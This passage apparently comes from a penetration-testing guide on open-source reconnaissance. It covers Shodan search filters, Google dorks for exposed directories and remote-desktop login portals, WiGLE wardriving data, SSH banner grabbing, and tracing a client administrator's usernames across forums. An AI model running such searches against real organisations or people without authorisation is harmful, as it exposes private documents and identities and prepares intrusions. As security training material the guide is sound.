Let’s jump back into our trusty search engine and look for Microsoft and 15.0.1497.2. Top result? Exchange Server build numbers and release dates. Search the page for that build number and we end up with Exchange Server 2013 CU (cumulative update) 23, released on June 18, 2019. Well, I’m writing this in 2021, almost 2 years later, so it’s back to the search engine to try this: vulnerabilities and 2013 CU23. We end up finding CVE-2021-28480, CVE-2021-28481, CVE-2021-28482, and CVE-2021-28483 – remote code execution vulnerabilities. We already have an internal subnet to investigate: 10.255.0.0/16. You have to admit this isn’t too shabby when you consider that all we did was send an email. Thus, here comes yet another reminder: take good notes. Write down everything you do. Don’t skimp on the screen captures – I would sometimes record my screen while I worked.
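The address analysis from the bounce message can be reproduced with Python's standard ipaddress module. This is a sketch under stated assumptions: the hostnames and addresses are the ones listed above, but the layout of BOUNCE_HOPS is invented and does not reproduce the real header format, and the function names are hypothetical.

```python
import ipaddress
import re

# Only the hostnames and addresses come from the bounce message discussed
# above; the layout of this text is invented for illustration.
BOUNCE_HOPS = """
ME-VM-MBX02 (10.255.134.142)
ME-VM-CAS02 (10.255.134.140) (10.255.27.36)
ME-VM-MAILGW01 (10.255.134.160)
"""

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def private_addresses(text):
    """Return every private IPv4 address found in the text, in order."""
    found = []
    for candidate in IPV4.findall(text):
        try:
            address = ipaddress.ip_address(candidate)
        except ValueError:
            continue  # looked like an address but was not valid (e.g. 999.1.1.1)
        if address.is_private:
            found.append(address)
    return found


def covering_network(addresses):
    """Return the smallest single network that contains every address."""
    network = ipaddress.ip_network(f"{addresses[0]}/32")
    while not all(address in network for address in addresses):
        network = network.supernet()
    return network


leaked = private_addresses(BOUNCE_HOPS)
print([str(address) for address in leaked])
print(covering_network(leaked))
```

The covering network is only a starting guess for later phases; the real internal subnetting may be finer than what four addresses suggest.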

I know a guy – services doing the probing for you

Back in my day, we had to walk 15 miles through the snow to get to the pen test. We didn’t even have computers – we used empty bean cans with a string tied between them to send and receive packets. Okay, I’m joking, but things are definitely different these days for the younglings. There’s a lot of work that can be taken out of your hands in today’s world of what I like to call EaaS: Everything-as-a-Service. This is important for pen testers because it allows you to do more with a small amount of time – you’re only with your client for a set window of time and it won’t feel like enough. You’ll be taking advantage of time-saving measures at all phases of an assessment (hello, scripting ability) but OSINT is no exception – even though we haven’t sat down with Kali yet. Let’s take a look.

Security header scanners

There are a few of these online. Try typing into a search engine security header scanners. One of the better ones is SecurityHeaderScanner.com, a service I used for this client example:

Figure 1.7 – The result from SecurityHeaderScanner.com after scanning my client

Yikes. That looks like my report card from my sophomore year of high school (sorry, Mom and Dad). In this particular assessment, I was able to use this information to pull off some successful cross-site scripting, clickjacking, and formjacking attacks. I could have figured this out manually, of course, but the time saved increases the value you provide to your client.

This is an example of a real-time test of public resources provided by your target – we asked this particular service to visit the website now and tell us what it sees. Another way to look at this pre-Kali stage of OSINT is to gather the information that has already been gathered by all of those crawlers taking peeks at every corner of the internet, 24/7/365. We need to be aware of the difference, as the information we find from such resources is not real-time and may not be accurate at the time of your assessment.
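The kind of check a header scanner performs can be sketched offline against headers you have already captured. This is a minimal sketch: the list of expected headers is my own assumption of common security headers, not the actual checklist or grading scheme of any particular scanning service, and the sample headers are invented.

```python
# Commonly recommended response headers; this list is an assumption and
# does not mirror any specific scanner's checks.
EXPECTED_HEADERS = (
    "Strict-Transport-Security",
    "Content-Security-Policy",
    "X-Frame-Options",
    "X-Content-Type-Options",
    "Referrer-Policy",
)


def missing_security_headers(response_headers):
    """Return the expected headers that are absent (names are case-insensitive)."""
    present = {name.lower() for name in response_headers}
    return [header for header in EXPECTED_HEADERS if header.lower() not in present]


# Hypothetical response headers, invented for this example.
sample = {
    "Server": "Apache/2.4.41 (Unix)",
    "Content-Type": "text/html",
    "x-content-type-options": "nosniff",
}

print(missing_security_headers(sample))
```

Note that fetching the headers yourself would mean talking to the target directly; letting a third-party service do the visit is what keeps this step on the OSINT side of the line.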

Open source wireless analysis with WIGLE

I would never forgive myself if I didn’t mention wigle.net in the context of open source digging with sites that did the probing for us already. This one is special, though – it’s a true crowd-sourced initiative. Resources like Shodan are organizations that own their probing and crawling machines. Their game is to give you access to the database they built with their own hardware. WIGLE, on the other hand, is a collection of what volunteer wardrivers around the world have gathered with their own hardware and modes of transportation.

Note

If the term is unfamiliar, wardriving refers to the practice of moving around an area with a device configured to detect and report wireless networks. The name suggests driving a car, as that’s a great way to cover larger areas, but you can also go warbiking, warwalking, or even send out a wardrone or a warkitteh (a man attached Wi-Fi sniffing hardware to his outdoor cat’s collar). I’m still not sure if warscooting is a thing yet.

At the time of writing, wigle.net contains information about 745 million networks, gathered from 10.5 billion individual observations. The key to the observations is the combination of device reconnaissance and GPS data, allowing you to place the observation on a map. Keep in mind, these locations are where the observation was made, not the location of the access point. This becomes clear when you zoom in on the map, as shown here:

Figure 1.8 – Zooming in on a neighborhood on wigle.net

You can see the observations largely center on roads, suggesting that the observers are driving around with their laptops or smartphones. But you can also see spots in the middle of wide-open spaces, like Firefighters Park in the preceding screenshot, or even in the middle of the ocean, as shown in the following screenshot:

Figure 1.9 – Wardriving observations from the North Atlantic

These observations likely correspond to shipping lanes or even airways. This should give you an idea of the sheer size of this dataset.

Where it will be useful to you, as an intrepid open source investigator, is gathering information about wireless networks without setting foot near the site. With some clients, this won’t really mean much. But for others who may be physically spread out, like with a massive data center or numerous individual facilities, some recon on the location of certain networks may come in useful. Again, by location, we mean the area where an observation was possible. Wireless networks are low-power, and most wardrivers aren’t packing exceptionally high-gain antennas while driving around, so you can assume you’ll be within a block or two, if not closer.

The world of Shodan

There is a site you probably already know about, and if you don’t, prepare to spend a few hours exploring its treasures: shodan.io. Back in my day, when you saw a device firing off frames on the wire, you knew it was a computer. Today, a surprising variety of devices are network-capable, and your refrigerator may very well be another budding leaf at the end of sprawling branches of this global tree we call the internet. The rapid proliferation of this connectedness and its penetration into our daily lives is concerning for us security nerds, but we’re not going to wax philosophical today. The point is, it occurred to some clever folks along the way that crawling the internet to see what’s open and ready to chat will be very interesting as new leaves start popping up. Enter Shodan.

The name started as an acronym from a classic 1990s video game series, System Shock. SHODAN stands for Sentient Hyper-Optimized Data Access Network. In a classic sci-fi turn of events, SHODAN was originally an artificial intelligence whose purpose was to help people... but something went wrong. You get the idea. Think Skynet from the Terminator series or V.I.K.I. from I, Robot. The AI goes wonky and decides humans are mere bugs for squashing. The common thread is that the AI was granted entirely too much access to global systems in order for it to do its job. As SHODAN grabbed control over numerous disparate systems, shodan.io’s creator John Matherly figured it’s an appropriate reference.

To be clear, Shodan isn’t a website that is hell-bent on the annihilation of all humankind (but that would be an awesome movie). The “disparate systems” part is the all-too-creepy reference here, as Shodan crawls the internet, just poking around the unlocked doors tucked away in the back alleyways. If you want to find webcams, a fridge that’s running low on milk, or – more terrifyingly – SCADA systems inside massive plants, then Shodan is the place to check it out. What the hacker in you should be realizing is something like, what about an SSH server on unexpected ports, in an attempt to hide in plain sight? Excellent thinking. We want to focus on our client’s resources that were already sniffed by someone else. Suppose your client really is running SSH on port 2222 (this is surprisingly common, as Shodan will show you). We have a head start on the discovery phase of our assessment, and once again, we didn’t send any packets. A Shodan crawler sent the packets.

The general principle here is banner grabbing. Banners are nothing more than text-based messages that greet the client connecting to a particular service. They’re useful for the rightful administrators of these servers to catalog assets and troubleshoot problems. Suppose you have a large inventory of servers hosting a particular service and you want to validate the version that’s running on each host. You could type up a small script that will initiate those connections, find the version number in the banner, and put it all in a tidy list on your screen. They are also extremely useful for narrowing our focus while we are developing the attack on our target. We’ll see hands-on banner grabbing later when we’re sitting down at Kali. In the meantime, we’re going to take advantage of the fact that someone has already taken a look at what the internet looks like down to the service level, and our job is to see what our client is telling the world. You’ll be surprised again and again during assessments by how much the clients do not know about what’s floating around out there with their name on it.
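The administrator's inventory script mentioned above might look something like the following. This is a minimal sketch for SSH only, meant for hosts you own or are authorized to test; the function names and the sample banner are hypothetical, and other services format their banners differently.

```python
import re
import socket

# SSH servers announce themselves as "SSH-<protocol>-<software> [comments]".
SSH_BANNER = re.compile(r"^SSH-(?P<protocol>\d+\.\d+)-(?P<software>\S+)")


def grab_banner(host, port, timeout=3.0):
    """Connect, read whatever the service volunteers first, and return it as text."""
    with socket.create_connection((host, port), timeout=timeout) as conn:
        return conn.recv(1024).decode("utf-8", errors="replace").strip()


def parse_ssh_banner(banner):
    """Split an SSH banner into protocol and software version, or return None."""
    match = SSH_BANNER.match(banner)
    return match.groupdict() if match else None


def inventory(hosts, port=22):
    """Build a tidy (host, software) list; connection failures are recorded, not raised."""
    rows = []
    for host in hosts:
        try:
            info = parse_ssh_banner(grab_banner(host, port))
        except OSError as exc:
            rows.append((host, f"error: {exc}"))
            continue
        rows.append((host, info["software"] if info else "unrecognized banner"))
    return rows


# Parsing a sample banner needs no network connection at all.
print(parse_ssh_banner("SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5"))
```

Only grab_banner touches the network. During the OSINT phase you would feed parse_ssh_banner with banner text that a crawler already recorded, rather than connecting yourself.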

Is banner grabbing a worthy finding for a pen test?

Findings are graded by their overall risk rating. Businesses consider a couple of things when it comes to risk management: how likely and how impactful a compromise would be. Suppose a vulnerability is very unlikely to be exploited, but exploiting it would threaten the entire organization. That’s still going to be considered higher risk. Banner grabbing would fall in the category of very likely (due to its simplicity), and very low impact. Remember that an important part of your job is educating your client on how these things work. Yes, it will be one of the low-risk findings. But if your banner grab narrowed your focus and saved you time, thus giving you more time after the compromise to do even more movement and loot-grabbing, it belongs in the report. It’s a part of the attack!

Shodan search filters

You can start simple, such as punching in an IP address or a service name. For example, we could try Remote Desktop Protocol (RDP) or Samba. To turn this global eye into a fine-tuned microscope, however, we need to apply search filters. The format is very simple: you merely separate the name of the filter from its query with a colon (:). A real handy way to fine-tune your results is to negate a particular query by putting a dash (-) before the filter name. Let’s take a look at the filters available to us, and then we’ll go over some examples.

asn: Search by autonomous system number. An autonomous system (AS) is a group of IP prefixes operated by one or more entities for maintaining one clear routing policy, allowing these entities to exchange routes with other ISPs. This search is useful when you are looking for hosts under the control of one or more such entities as defined by their assigned ASN.

city: Search by the city where the host is located.

country: Search by country with alpha-2 codes as per the ISO 3166 standard.

geo: Allows you to specify geographical coordinates. Linking a specific host to its geographical coordinates is notoriously iffy, so it’s best to establish a range with this filter. Draw a box over the area you want to search and grab the lat/lon pairs for the top-left corner of the box and the lower-right corner of the box. For example, searching geo:12.63,-70.10,12.38,-69.82 will return results anywhere on the island of Aruba.

has_ipv6: Searches for IPv6 support; expects true (or 1) or false (or 0).

has_screenshot: Returns results where a screenshot was captured. This is useful for things such as RDP and VNC. Expects the Boolean true/false (1/0).

has_ssl: Shows services with SSL support. Expects true (or 1) or false (or 0).

hash: Each page that’s grabbed by Shodan is hashed. This could be handy for looking for pages with the exact same text on them, but you’ll probably use this with the negation dash (-) and a zero to skip results where the banners are blank, like this: -hash:0.

hostname: Specify the hostname or just a part of it.

ip: The same as net, this lets you specify an IP range in CIDR format.

isp: Take a look at a specific ISP’s networks.

net: The same as ip – this lets you specify an IP range in CIDR format.

org: This is where you specify the organization’s name.

os: Very handy indeed – specify the operating system.

port: Check specific ports. Negating this filter is especially useful for finding services that are operating on non-standard ports. For example, ssh -port:22 will find all instances of SSH on anything other than the standard SSH port.

product: A crucial option for narrowing down a specific product running the service. For example, product:Apache -port:80,443 will find any Apache server on non-standard ports.

version: Useful for targeting specific product version numbers.
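The geo filter's corner ordering is easy to get backward, so here is a small sketch that builds the filter string from a bounding box and checks the corners first. The helper names are hypothetical, the two-decimal formatting is simply chosen to match the Aruba example above, and boxes that cross the 180° meridian are not handled.

```python
def geo_filter(top_left, bottom_right):
    """Build a geo: filter from (lat, lon) pairs for the top-left and lower-right corners."""
    (north, west), (south, east) = top_left, bottom_right
    if north <= south or west >= east:
        raise ValueError("expected top-left corner first, then lower-right corner")
    return f"geo:{north:.2f},{west:.2f},{south:.2f},{east:.2f}"


def box_contains(top_left, bottom_right, point):
    """Return True if the (lat, lon) point falls inside the box."""
    (north, west), (south, east) = top_left, bottom_right
    lat, lon = point
    return south <= lat <= north and west <= lon <= east


# The Aruba box from the filter description above.
aruba = ((12.63, -70.10), (12.38, -69.82))
print(geo_filter(*aruba))

# A point roughly in the middle of the box, used as a sanity check.
print(box_contains(*aruba, (12.50, -69.97)))
```

Checking a known landmark against the box before searching saves you from sifting through results for the wrong patch of ocean.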

Note

We’re covering the filters that are available to basic users. There are more sophisticated filters available to small business and enterprise accounts if such a thing is within your budget.

Let’s take a look at how we can whittle away at our results and home in on what we need. First, let’s say our target is in Mexico City:

city:"Mexico City"

On second thought, I want to make sure I cover the region around and including Mexico City. So, I’ll try this instead:

geo:19.58,-99.37,19.21,-98.79

Now, I want to look for SSH on any non-standard port:

geo:19.58,-99.37,19.21,-98.79 ssh -port:22

And I only want Debian hosts:

geo:19.58,-99.37,19.21,-98.79 ssh -port:22 os:Debian

Finally, suppose I know the subnet for my target is 187.248.0.0/17:

geo:19.58,-99.37,19.21,-98.79 ssh -port:22 os:Debian net:187.248.0.0/17

With that, I hit Enter and see what Shodan has in store for me:

Figure 1.10 – Homing in on my targets

When I started looking at the Mexico City region, I had 1.5 million results to sift through. My fine-tuning reduced that list to only two servers. This is a fully random example for demonstration purposes – when you’re researching for a specific client, you’ll be trying the org filter, perhaps the asn filter, and whatever else you have to go on.
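The whittling-down process above lends itself to a tiny query builder, which is handy when you want to record each step in your notes. This sketch only assembles the search string using the colon, dash, and quoting rules described earlier; shodan_filter and build_query are hypothetical helper names, and nothing here calls the Shodan service.

```python
def shodan_filter(name, value, negate=False):
    """Format one filter as name:value, quoting values with spaces and prefixing - to negate."""
    text = str(value)
    if " " in text:
        text = f'"{text}"'
    prefix = "-" if negate else ""
    return f"{prefix}{name}:{text}"


def build_query(*parts):
    """Join free-text terms and filters into a single search string."""
    return " ".join(parts)


# The final Mexico City query from the walkthrough above, built piece by piece.
query = build_query(
    "geo:19.58,-99.37,19.21,-98.79",
    "ssh",
    shodan_filter("port", 22, negate=True),
    shodan_filter("os", "Debian"),
    shodan_filter("net", "187.248.0.0/17"),
)

print(shodan_filter("city", "Mexico City"))
print(query)
```

For a real client, you would swap in the org or asn filters the same way, for example shodan_filter("org", "Your Client Inc") with whatever name your research turned up.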

Google’s dark side

Our last stop for goodies before we arrive at the desk where Kali eagerly awaits is Google. No, we’re not going to check the weather or find out why we call those spiky animals porcupines (apparently, it’s the Latin porcus (hog) and spina (thorn, spine) – who knew?). We’ll leverage the surgical scalpel of Google searching: operators. Keep the same spirit from Shodan – separate the operator from the query with a colon (:) and no spaces. Google, however, allows us to get pretty advanced.

Badda-bing

The concepts here apply to the Bing search engine as well (though you’ll want to review the operator specifics on their help pages). As a distinct search engine, you may find results on Bing that you won’t find on Google, and vice versa. It’s worth checking all your options!

Google’s advanced operators

Let’s first discuss what makes up an ordinary web page. Of course, you have the URL to type into your browser and to share with your friends. Then, you have the title of the page, and the distinction is technical – it will be explicitly formatted this way with the <title> tag in HTML. You’ll also have the text of the page, which is basically everything written on the page that isn’t the title or the URL. There are three reasons why we pen testers care about this:

Google can find stuff left on pages by administrators who may have neglected to understand the public nature of their posts – including talking about specific clients and the products they manage.

Google can find stuff left on pages by bad guys who may have already compromised your client, a partner, or an employee.

Services with web portals will have signatures that can distinguish them. The use of specific words (such as admin) in the URL, or a product, version, or company name in the text of the page, and so on.

Google is designed for the average user, using its snazzy algorithm to find what you want, and even what you didn’t realize you wanted. However, it is ready for the advanced user, too. You just need to know what to say to it. There are two ways of doing this: with operators directly, or within the Advanced Search feature. Let’s take a look at the different operators for direct use:

intitle: Return pages with your query within the page title.

inurl: Return pages with your query inside the URL to the page itself.

allintitle: The allin queries are special – they will only return results that contain all of your multiple keywords. For example, allintitle:"Satoshi" "identity" "bitcoin" "conspiracy" will return pages that contain all four words somewhere in the title, but not pages that have only three of those words in the title.

allinurl: This will only return results where all of your terms are contained in the URL.

allintext: Return only the pages that contain all of your terms in the text of the page.

filetype: A particularly powerful option that lets you specify the file type. For example, filetype:pdf will return PDF documents with your search criteria.

link: Another special fine-tuning option, this searches for pages that contain links to the URL or domain you specify here.

Just like with Shodan, you can negate an option with a dash (-). For example, I can look for the word explorer and avoid pages about the car with explorer -ford. You can also look for pages that contain one or more of several terms (as opposed to the allin options) with the OR operator. To see the difference, start with an allintext search, which will only return pages with all four terms in quotation marks:

allintext:"Satoshi" "identity" "bitcoin" "conspiracy"

However, the next example will return pages that mention any of the terms:

"Satoshi" OR "identity" OR "bitcoin" OR "conspiracy"

A useful shorthand for OR, by the way, is the pipe character (|). So, this is identical to the previous search:

"Satoshi" | "identity" | "bitcoin" | "conspiracy"
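If you find yourself building many variations of these searches, a few helper functions keep the quoting consistent. This is a minimal sketch that only formats strings according to the operator rules described above; the function names are hypothetical.

```python
def quoted(term):
    """Wrap a term in double quotes."""
    return f'"{term}"'


def all_in_text(terms):
    """Every term must appear in the text of the page."""
    return "allintext:" + " ".join(quoted(term) for term in terms)


def any_of(terms, pipe=False):
    """Any one of the terms may appear; pipe=True uses | instead of OR."""
    separator = " | " if pipe else " OR "
    return separator.join(quoted(term) for term in terms)


def without(query, term):
    """Exclude pages that mention the term."""
    return f"{query} -{term}"


terms = ["Satoshi", "identity", "bitcoin", "conspiracy"]
print(all_in_text(terms))
print(any_of(terms))
print(any_of(terms, pipe=True))
print(without("explorer", "ford"))
```

Keeping the generated strings in your notes alongside the results makes it much easier to reproduce a finding when you write the report.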

The Advanced Search page

Google has made things a little more user-friendly – just add /advanced_search after the google.com URL (that is, google.com/advanced_search), as shown in the following screenshot:

Figure 1.11 – Google’s Advanced Search window

For some advanced search capabilities, this accomplishes the same thing as putting the operators directly into the search box. However, narrowing results down to a specific date range is best done from the results page. First, enter your search query, then, click Tools followed by the Any time dropdown to select a custom range, as shown here:

Figure 1.12 – Customizing the date range for my results

I remember needing to use the daterange: operator with Julian dates. For example, Christmas Day of 2020 was Julian Day 2,459,209. Trust me, using a graphical calendar is much less annoying.
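If you ever do need a Julian day number, the conversion is one addition in Python. This sketch relies on the fact that Python's date ordinals count days from 0001-01-01 in the proleptic Gregorian calendar; the constant and function names are my own.

```python
from datetime import date

# Difference between Python's date ordinal (0001-01-01 is day 1) and the
# Julian Day Number for the same calendar date.
JDN_OFFSET = 1721425


def julian_day_number(day):
    """Convert a calendar date to its Julian Day Number."""
    return day.toordinal() + JDN_OFFSET


def from_julian_day_number(jdn):
    """Convert a Julian Day Number back to a calendar date."""
    return date.fromordinal(jdn - JDN_OFFSET)


print(julian_day_number(date(2020, 12, 25)))
print(from_julian_day_number(2459209))
```

The first call reproduces the 2,459,209 figure quoted above for Christmas Day of 2020.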

Thinking like a dark Googler

I’ve had a lot of financial organizations as pen test clients. The nature of their business involves a lot of paperwork, so it’s particularly tricky to keep everything tidy. Let’s take a look at a possible Google hacking mission, in this case, digging up financial information. Of course, for your needs, you’ll be using your client’s name or the name of an employee to accompany your fine-tuned search terms.

First, I try the following:

intitle:"index of" "Parent Directory" ".pdf" "statement"

Let’s break this down. By looking for index of with the words Parent Directory somewhere on the page, I’ll be finding exposed file directories that are hosted via HTTP/S. I’m also looking for any text with .pdf in it, which will catch directories hosting PDF files. Finally, I’m hoping someone will have put the word statement somewhere in their filename. As you can imagine, we’ll probably grab some false positives with this. But you may also find things like this, which I’m fairly certain was not intended to be sitting on the open web:

Figure 1.13 – The result of searching through public directories

Looks like someone’s going on a trip! This find didn’t have statement in its filename, but the files next to it did. When I click Parent Directory on some of these pages, I end up at the home page for the domain or a 404 page, strongly suggesting that these exposed directories are accidents. There’s nothing quite like a false sense of security to help you out in your endeavor. Finding an employee’s passports, tax returns, and the like, before you even sit down with your Kali toolkit, is a powerful message for your client’s management.

There are plenty of resources online to help you with sneaky Google searches. The Google Hacking Database over at the Exploit Database (exploit-db.com) is an excellent place to check out. I won’t rehash all the different searches you could try. The key lesson here is to apply whatever information you have on your client and try thinking in terms of how a resource presents itself to the internet. For example, I had a client for whom my initial research suggested the presence of a Remote Desktop portal. Searching the client’s domain with this was helpful:

inurl:RDWeb/Pages/en-US/login.aspx

How did I come up with that? Simple: I researched how these devices work. Find one, talk to it with your browser, and build a Google query with your client’s information. Have you considered your client’s IT support? We all need to ask for help now and then. Perhaps some of the IT staff at your client have asked for support online. Hmm, I'm not sure, a helpful compatriot replies, can you upload a packet dump from the device? Next thing you know, information deeply internal to your client has been exfiltrated to the web. I’ve seen it with clients more times than I’d like to admit. Just look for those communities and try combining parts of the URLs with inurl. For example, if you see your client’s name pop up along with the following, then you have a head start on the security software they may be using:

inurl:"broadcom.com/enterprisesoftware/communities"
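Combining a portal or community signature with client details can be scripted so that each search is logged as a ready-to-open link. This is a sketch under assumptions: the site: operator is a standard Google operator that is not in the list above, your-client.com and "Your Client" are placeholders, and the helper names are hypothetical.

```python
from urllib.parse import urlencode, urlsplit, parse_qs


def scoped_dork(domain, dork):
    """Restrict a search signature to one domain using the site: operator (assumed here)."""
    return f"site:{domain} {dork}"


def named_dork(client_name, dork):
    """Pair the client's name, as an exact phrase, with a search signature."""
    return f'"{client_name}" {dork}'


def search_url(query):
    """Return a Google search link with the query safely URL-encoded."""
    return "https://www.google.com/search?" + urlencode({"q": query})


# Placeholder client details combined with the two signatures from the text.
portal = scoped_dork("your-client.com", "inurl:RDWeb/Pages/en-US/login.aspx")
support = named_dork("Your Client", 'inurl:"broadcom.com/enterprisesoftware/communities"')

print(portal)
print(search_url(portal))
print(support)
```

Pasting the generated links into your notes next to a screenshot of the results gives you a reproducible trail for the report.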

An important skill with something as inherently hit-or-miss as OSINT is outside-the-box thinking. Suppose you’ve tried all of the Google tricks you can think of, looking for different vendors and URL strings, and you’ve come up dry. Well, do you know anything about the people who work there? I once had a client whose IT administrator had a unique name in her personal email address.

It didn’t take long before I linked this to a different username that she had used on Yahoo! in the past. I took this username and tried all kinds of search combinations, and boom – an obscure forum for the administrators of a highly specific operating system in an enterprise environment had posts from a user with this same name. She was careful enough to avoid mentioning her employer, which is why the usual searches described previously didn’t get me there. But I was able to connect the dots and determine she was indeed referring to the configuration of these hosts inside the network of my client, and later I could even correlate independent findings with information in these public posts. The connection that brought me to that information was just her use of an old Yahoo! Messenger name when anonymously